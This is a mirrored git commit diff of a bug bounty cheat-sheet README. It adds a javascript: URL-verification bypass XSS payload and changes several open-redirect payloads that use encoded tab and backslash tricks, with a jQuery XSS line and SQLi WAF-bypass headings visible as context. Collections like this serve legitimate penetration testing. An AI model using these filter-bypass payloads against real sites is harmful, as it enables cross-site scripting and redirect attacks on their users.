mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-25 04:20:19 +00:00
Merge branch 'master' of github.com:EdOverflow/bugbounty-cheatsheet
This commit is contained in:
EdOverflow
commit
1351147c92
1 changed files with 8 additions and 6 deletions
14
README.md
14
README.md
|
|
@ -40,6 +40,12 @@ Note: This kind of depends on what security level the application is set to. See
|
|||
$.get('http://sakurity.com/jqueryxss')
|
||||
```
|
||||
|
||||
**URL verification bypasses (works without `	` too)**
|
||||
|
||||
```html
|
||||
javas	cript://www.google.com/%0Aalert(1)
|
||||
```
|
||||
|
||||
## SQLI
|
||||
|
||||
**Akamai Kona Bypass**
|
||||
|
|
@ -137,15 +143,11 @@ If the target is running their application in debug mode you might be able to ru
|
|||
## Open Redirect
|
||||
|
||||
```
|
||||
/google.com
|
||||
/%09/google.com
|
||||
```
|
||||
|
||||
```
|
||||
%09/google.com
|
||||
```
|
||||
|
||||
```
|
||||
%5cgoogle.com
|
||||
/%5cgoogle.com
|
||||
```
|
||||
|
||||
```
|
||||
|
|
|
|||
Loading…
Reference in a new issue